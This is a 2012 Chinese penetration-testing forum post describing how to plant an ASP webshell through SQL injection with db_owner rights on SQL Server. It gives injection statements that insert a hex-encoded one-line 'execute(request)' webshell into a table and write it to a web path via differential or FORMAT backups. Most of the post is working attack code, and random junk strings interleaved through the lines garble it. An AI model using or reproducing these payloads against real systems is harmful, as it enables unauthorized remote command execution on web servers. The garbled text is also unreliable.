中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]
作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少8 G4 j/ U# h- Y* k4 ?& c: G
% J0 ^  p7 q( }+ g  u6 w# q
一利用差异备份
3 m0 q" ]% D$ u# P8 t) T, H加一个参数WITH DIFFERENTIAL' Z0 f0 H* _# O3 g8 g
! [" I* J1 ~# x  f- b; H* A
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
& d! F; p+ e( t/ E+ gcreate table [dbo].[xiaolu] ([cmd] [image]);
/ h- o/ ?4 M+ h% _6 dinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
  o/ Q; x6 B. g; r8 w# mdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL1 {; v( y+ y! q9 `8 V7 O2 l. D
; o  h* J& ?3 Z5 @
二利用完全FORMAT
) }9 j: j/ D# f7 G* y! e: c加一个参数WITH FROMAT
  D6 \: M1 ]1 e- [1 q0 @2 ^有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以$ y9 Z9 R4 x" c. D
! b( ^+ Z" `; }* ?8 o+ ~
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
6 \+ j) m1 l) X- y( d: Ycreate table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* H, I3 K( v% P! j- Y. ~declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT" f( |. B" v3 E/ k

) @1 m% W& w! _! ?总的来说就是那么简单几句,下面以备份数据库model为例子- E, H- _5 \1 z7 M9 E: h
  U( e7 n' W, C" l& n& c
id=1;use model create table cmd(str image);insert into cmd(str) values (”)
- e( {+ S" i  r4 c1 p* f4 ^3 a6 s$ ?! [3 |
id=1;backup database model to disk=’你的路径‘ with differential,format;–/ Q5 ?; M3 x' o) f, Z7 O
8 K  ]9 V5 d: r& M- r# K# Z3 [! N+ ?




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2